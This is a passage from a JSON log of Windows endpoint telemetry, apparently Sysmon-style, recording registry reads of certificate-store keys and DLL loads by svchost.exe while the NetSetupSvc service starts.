"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupEngine.dll", - "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573793230000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 1332, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883573793580000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupApi.dll", - "image_path": "C:\\Windows\\System32\\NetSetupApi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupSvc.dll", - "image_path": "C:\\Windows\\System32\\NetSetupSvc.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\State", - "registry_value": "State", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupEngine.dll", - "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - 